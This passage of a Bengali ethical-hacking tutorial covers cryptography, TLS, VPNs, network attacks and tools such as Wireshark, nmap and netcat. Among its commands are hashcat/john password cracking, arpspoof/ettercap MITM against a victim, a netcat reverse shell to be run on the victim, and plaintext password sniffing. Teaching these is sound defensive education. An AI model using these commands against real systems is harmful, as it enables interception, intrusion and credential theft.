3DES168-bit64-bit⚠️ দুর্বল হচ্ছেLegacy
AES-128128-bit128-bit✅ নিরাপদWPA2, TLS
AES-256256-bit128-bit✅ সর্বোচ্চ নিরাপদMilitary, HTTPS
ChaCha20256-bitStream✅ নিরাপদTLS 1.3, Mobile

Asymmetric Encryption (অপ্রতিসম এনক্রিপশন)

দুটি Key — Public Key (সবাইকে দেওয়া যায়) ও Private Key (শুধু নিজের কাছে)।

Sender                              Receiver
  |                                    |
  | Receiver-এর Public Key দিয়ে      | নিজের Private Key দিয়ে
  | Encrypt → "X7$mK9#"  ──────────→ | Decrypt → "Hello"
  |                                    |
  
Digital Signature (বিপরীত):
Sender নিজের Private Key দিয়ে Sign করে
Receiver Sender-এর Public Key দিয়ে Verify করে
অ্যালগরিদমKey Sizeস্ট্যাটাসব্যবহার
RSA-20482048-bit✅ ঠিক আছেSSL/TLS, SSH, Email
RSA-40964096-bit✅ ভালোHigh security
ECC (P-256)256-bit✅ সর্বোচ্চ ভালোTLS 1.3, মোবাইল
Ed25519256-bit✅ সর্বোচ্চSSH Key, Modern TLS
DSA1024-bit⚠️ দুর্বলLegacy

Hashing — একমুখী ফাংশন

Hash এমন একটি ফাংশন যা যেকোনো ডেটা থেকে নির্দিষ্ট দৈর্ঘ্যের একটি মান তৈরি করে। Hash থেকে মূল ডেটা বের করা অসম্ভব।

echo -n "Hello" | md5sum # 8b1a9953c4611296a827abf8c47804d7 echo -n "Hello" | sha256sum # 185f8db32921... (256-bit) echo -n "Hello" | sha512sum # 3615f80c9d29... (512-bit) # Hash Cracking hashcat -m 0 hash.txt rockyou.txt # MD5 crack hashcat -m 1000 hash.txt wordlist.txt # NTLM crack (Windows) john --wordlist=rockyou.txt hash.txt # John the Ripper
অ্যালগরিদমOutputস্ট্যাটাসব্যবহার
MD5128-bit❌ ভাঙা! Collision সম্ভবপুরনো, ব্যবহার করবেন না
SHA-1160-bit❌ ভাঙাপুরনো SSL-এ ছিল
SHA-256256-bit✅ নিরাপদBitcoin, TLS, Password
SHA-512512-bit✅ ভালোHigh security
bcryptVariable✅ পাসওয়ার্ডের জন্য সেরাPassword hashing
Argon2Variable✅ সর্বোচ্চ সেরাModern password hashing

TLS/SSL — HTTPS-এর ভিত্তি

TLS Handshake (সরলীকৃত):
Client                          Server
  |                                |
  |── ClientHello (TLS version, ──→|
  |   supported ciphers)           |
  |                                |
  |←── ServerHello + Certificate ──|
  |    (Server-এর Public Key সহ)  |
  |                                |
  |── Pre-Master Secret ──────────→| (Server-এর Public Key দিয়ে encrypt)
  |   (র‍্যান্ডম নম্বর)            |
  |                                |
  |   উভয়পক্ষ Session Key তৈরি করে|
  |                                |
  |══════ Encrypted Data ══════════| (Symmetric AES দিয়ে)
ভার্সনস্ট্যাটাসসমস্যা
SSL 2.0❌ বন্ধ করুনঅনেক দুর্বলতা
SSL 3.0❌ বন্ধ করুনPOODLE Attack
TLS 1.0❌ বন্ধ করুনBEAST, POODLE
TLS 1.1⚠️ দুর্বলRC4 সমস্যা
TLS 1.2✅ ঠিক আছেসঠিক cipher suite দরকার
TLS 1.3✅ সর্বোচ্চদ্রুত ও সবচেয়ে নিরাপদ

PKI ও SSL Certificate

PKI (Public Key Infrastructure) হলো Certificate ব্যবস্থাপনার একটি সিস্টেম।

# SSL Certificate চেক করা openssl s_client -connect google.com:443 sslyze --regular target.com # SSL দুর্বলতা স্ক্যান testssl.sh target.com # বিস্তারিত SSL অ্যানালাইসিস
CHAPTER 09
🛡️ নেটওয়ার্ক সিকিউরিটি কনসেপ্ট

VPN (Virtual Private Network)

VPN এনক্রিপ্টেড টানেল তৈরি করে Public Internet-এর মধ্য দিয়ে নিরাপদে ডেটা পাঠায়।

তোমার PC ──→ [Encrypted Tunnel] ──→ VPN Server ──→ Internet
              (ISP দেখতে পায় না)

Site-to-Site VPN:
Office A ──→ [VPN Tunnel] ──→ Office B
(দুটো অফিস একটি নেটওয়ার্কের মতো কাজ করে)
VPN Protocolপোর্টগতিনিরাপত্তাব্যবহার
OpenVPN1194/UDPভালো✅ উচ্চসবচেয়ে জনপ্রিয় Open Source
WireGuard51820/UDPসর্বোচ্চ✅ উচ্চআধুনিক, দ্রুততম
IPsec/IKEv2500/UDPভালো✅ উচ্চMobile VPN
L2TP/IPsec1701/UDPমাঝারি✅ ঠিক আছেEnterprise
PPTP1723/TCPদ্রুত❌ দুর্বলব্যবহার করবেন না!

Zero Trust সিকিউরিটি মডেল

"Never Trust, Always Verify" — এই নীতিতে কেউই স্বয়ংক্রিয়ভাবে বিশ্বাসযোগ্য নয়, ভেতরে থাকলেও।

পুরনো মডেল (Perimeter Security)

  • Firewall-এর ভেতরে থাকলে বিশ্বাস করো
  • বাইরেরটা block করো
  • ভেতরে ঢুকলেই সব অ্যাক্সেস

❌ সমস্যা: একজন insider বা হ্যাকড অ্যাকাউন্ট সব কিছু নষ্ট করতে পারে

Zero Trust মডেল

  • প্রতিটি request verify করো
  • Least privilege দাও
  • সব কিছু log করো
  • Microsegmentation ব্যবহার করো

✅ সুবিধা: ভেতরে ঢুকলেও সীমিত ক্ষতি করতে পারে

সাধারণ নেটওয়ার্ক অ্যাটাক

১. Man-in-the-Middle (MITM) Attack

স্বাভাবিক:  Client ────────────────── Server
MITM:        Client ── Hacker ──────── Server
             (Hacker মাঝখানে ট্র্যাফিক দেখে ও পরিবর্তন করে)

পদ্ধতি:
- ARP Spoofing → LAN-এ MITM
- Evil Twin → WiFi-এ MITM
- SSL Stripping → HTTPS কে HTTP-তে নামায়
- DNS Spoofing → ভুল সার্ভারে নিয়ে যায়

২. DDoS (Distributed Denial of Service)

ধরনপদ্ধতিউদাহরণ
Volumetricব্যান্ডউইথ ভরিয়ে দেওয়াUDP Flood, ICMP Flood
Protocolসার্ভার রিসোর্স শেষ করাSYN Flood, Ping of Death
ApplicationLayer 7-এ অ্যাটাকHTTP Flood, Slowloris
Amplificationছোট request → বড় responseDNS Amplification, NTP Amplification

৩. Port Scanning

# Nmap - সবচেয়ে জনপ্রিয় পোর্ট স্ক্যানার nmap -sV 192.168.1.1 # Service version detect nmap -sS target.com # SYN Stealth Scan nmap -p- target.com # সব পোর্ট স্ক্যান nmap -A -T4 target.com # Aggressive Scan nmap -sU target.com # UDP Scan nmap --script vuln target.com # Vulnerability Scan

৪. ARP Spoofing — MITM-এর ভিত্তি

# Kali Linux-এ ARP Spoofing arpspoof -i eth0 -t [victim_ip] [gateway_ip] arpspoof -i eth0 -t [gateway_ip] [victim_ip] # IP Forwarding চালু করো echo 1 > /proc/sys/net/ipv4/ip_forward # অথবা ettercap দিয়ে ettercap -T -q -i eth0 -M arp:remote /[victim]// /[gateway]//

Firewall Rule বোঝা

# iptables (Linux Firewall) iptables -L -n -v # Current rules দেখা iptables -A INPUT -p tcp --dport 22 -j ACCEPT # SSH allow iptables -A INPUT -p tcp --dport 80 -j ACCEPT # HTTP allow iptables -A INPUT -j DROP # বাকি সব block # UFW (Ubuntu) ufw enable ufw allow ssh ufw allow 80/tcp ufw deny from 192.168.1.100 # নির্দিষ্ট IP block

নেটওয়ার্ক সিকিউরিটি Architecture

Internet
    |
[Firewall - Edge]
    |
[DMZ Zone]
├── Web Server
├── Mail Server
└── DNS Server
    |
[Internal Firewall]
    |
[Internal Network]
├── [HR Subnet - 10.10.1.0/24]
├── [Finance Subnet - 10.10.2.0/24]
├── [IT Subnet - 10.10.3.0/24]
└── [Database Subnet - 10.10.4.0/24]

DMZ = DeMilitarized Zone
(Internet থেকে access পায় কিন্তু
Internal Network থেকে আলাদা)
CHAPTER 10
🔬 নেটওয়ার্ক অ্যানালাইসিস টুল

Wireshark — প্যাকেট অ্যানালাইজার

Wireshark হলো সবচেয়ে জনপ্রিয় নেটওয়ার্ক প্রোটোকল অ্যানালাইজার। নেটওয়ার্ক ট্র্যাফিক ক্যাপচার করে বিশ্লেষণ করা যায়।

গুরুত্বপূর্ণ Wireshark Filter

# Wireshark Display Filter ip.addr == 192.168.1.1 # নির্দিষ্ট IP-এর সব ট্র্যাফিক tcp.port == 80 # HTTP ট্র্যাফিক http.request # শুধু HTTP Request http.response.code == 200 # সফল HTTP Response dns # সব DNS ট্র্যাফিক tcp.flags.syn == 1 # SYN Packet (Port scan দেখা) ftp # FTP ট্র্যাফিক (পাসওয়ার্ড দেখা যাবে!) http contains "password" # HTTP-তে পাসওয়ার্ড খোঁজা !(arp or dns or icmp) # নয়েজ ফিল্টার করা

tcpdump — Command Line প্যাকেট ক্যাপচার

tcpdump -i eth0 # eth0-এ ট্র্যাফিক ক্যাপচার tcpdump -i eth0 -w capture.pcap # ফাইলে সেভ tcpdump -r capture.pcap # ফাইল পড়া tcpdump host 192.168.1.100 # নির্দিষ্ট Host tcpdump port 80 # HTTP ট্র্যাফিক tcpdump -i eth0 'tcp[13] == 2' # SYN Packet tcpdump -A -i eth0 port 21 # FTP পাসওয়ার্ড দেখা (Plaintext)

Nmap — নেটওয়ার্ক ম্যাপার

# বেসিক স্ক্যান nmap 192.168.1.1 # একটি Host স্ক্যান nmap 192.168.1.0/24 # পুরো সাবনেট স্ক্যান nmap -p 22,80,443 target.com # নির্দিষ্ট পোর্ট nmap -p- target.com # সব ৬৫৫৩৫ পোর্ট # উন্নত স্ক্যান nmap -sV target.com # Service Version nmap -O target.com # OS Detection nmap -A target.com # সব একসাথে nmap -sS target.com # Stealth SYN Scan nmap -sU target.com # UDP Scan nmap -sn 192.168.1.0/24 # Host Discovery (Ping Sweep) # NSE Script nmap --script=http-title target.com nmap --script=smb-vuln-ms17-010 target.com # EternalBlue চেক nmap --script=vuln target.com # সাধারণ Vulnerability nmap --script=default target.com

Netcat — সুইস আর্মি নাইফ

# Port Listener nc -lvp 4444 # পোর্ট 4444-এ listen # Connect nc 192.168.1.1 80 # পোর্ট 80-এ connect # Reverse Shell nc -e /bin/bash 192.168.1.10 4444 # Victim-এ চালাও # Port Scanning nc -zv target.com 1-1000 # পোর্ট স্ক্যান # File Transfer nc -lvp 4444 > received_file # Receiver nc 192.168.1.1 4444 < file.txt # Sender

অন্যান্য গুরুত্বপূর্ণ টুল

টুলকাজকমান্ড উদাহরণ
pingHost জীবিত আছে কিনাping google.com
tracerouteপ্যাকেটের পথ দেখাtraceroute google.com
netstatসক্রিয় সংযোগ দেখাnetstat -tulnp
ssSocket Statisticsss -tulnp
arpARP Table দেখাarp -a
routeRouting Table দেখাroute -n
ifconfig/ipনেটওয়ার্ক Interfaceip addr show
whoisDomain তথ্যwhois google.com
curlHTTP Request করাcurl -I https://target.com
masscanদ্রুত পোর্ট স্ক্যানmasscan -p1-65535 target

প্যাকেট অ্যানালাইসিস — হ্যান্ডস-অন

HTTP Login ক্যাপচার করা (শিক্ষামূলক)

# HTTP (Plaintext) Login ক্যাপচার tcpdump -i eth0 -A port 80 | grep -i "password\|user\|login" # Wireshark Filter: http.request.method == "POST" # তারপর Follow TCP Stream করলে Form Data দেখা যাবে # এই কারণেই HTTPS বাধ্যতামূলক!

SYN Scan কীভাবে Wireshark-এ দেখায়

Port Open:    SYN → SYN-ACK → RST   (পোর্ট খোলা)
Port Closed:  SYN → RST             (পোর্ট বন্ধ)
Filtered:     SYN → (কোনো response নেই)  (Firewall আছে)

📋 সারসংক্ষেপ — সাইবার সিকিউরিটির জন্য নেটওয়ার্কিং চেকলিস্ট

  • ✅ OSI ও TCP/IP মডেলের প্রতিটি লেয়ার এবং সেখানে হওয়া অ্যাটাক বোঝো
  • ✅ IP Addressing, Subnetting ও CIDR notation আয়ত্ত করো
  • ✅ TCP Three-Way Handshake ও UDP পার্থক্য ভালোভাবে বোঝো
  • ✅ গুরুত্বপূর্ণ পোর্ট নম্বর মুখস্থ করো (22, 80, 443, 445, 3389...)
  • ✅ DNS কীভাবে কাজ করে ও DNS অ্যাটাক বোঝো
  • ✅ ক্রিপ্টোগ্রাফি — Symmetric, Asymmetric, Hashing, TLS জানো
  • ✅ Wireshark দিয়ে প্যাকেট পড়তে পারো
  • ✅ Nmap দিয়ে নেটওয়ার্ক স্ক্যান করতে পারো
  • ✅ ওয়্যারলেস সিকিউরিটি ও WPA2 crack বুঝতে পারো
  • ✅ Firewall Rules বুঝতে ও লিখতে পারো
NEXT STEPS
🚀 পরবর্তী পদক্ষেপ

প্র্যাকটিস করার জায়গা

প্ল্যাটফর্মকী শিখবেখরচ
TryHackMeNetworking, Linux, Web Hackingআংশিক ফ্রি
HackTheBoxReal-world machine hackingআংশিক ফ্রি
PortSwigger Web AcademyWeb application securityসম্পূর্ণ ফ্রি
Cisco Packet Tracerনেটওয়ার্ক সিমুলেশনফ্রি
GNS3উন্নত নেটওয়ার্ক সিমুলেশনফ্রি
VulnHubVM-based CTFসম্পূর্ণ ফ্রি

সার্টিফিকেশন রোডম্যাপ

Beginner:
CompTIA Network+ → CompTIA Security+
        ↓
Intermediate:
CEH (Certified Ethical Hacker)
eJPT (eLearnSecurity Junior Penetration Tester)
        ↓
Advanced:
OSCP (Offensive Security Certified Professional) — সেরা!
PNPT (Practical Network Penetration Tester)
        ↓
Expert:
OSCE3, CRTE, CRTO (Red Team Operations)
💡 শেষ কথা
নেটওয়ার্কিং শেখা একদিনে হয় না। Kali Linux-এ বিভিন্ন টুল নিয়ে নিজে পরীক্ষা করো, TryHackMe-তে Lab করো, এবং সবচেয়ে গুরুত্বপূর্ণ — সব সময় ethical উপায়ে শেখো। তোমার কাছে ইতোমধ্যে VirtualBox ও Kali Linux আছে — এটাই যথেষ্ট শুরু করার জন্য!

এই ডকুমেন্টটি সম্পূর্ণ শিক্ষামূলক উদ্দেশ্যে তৈরি।

Ethical Hacking শুধুমাত্র অনুমতিপ্রাপ্ত পরিবেশে প্র্যাকটিস করুন।

🛡️ Stay Ethical. Stay Legal. Stay Curious.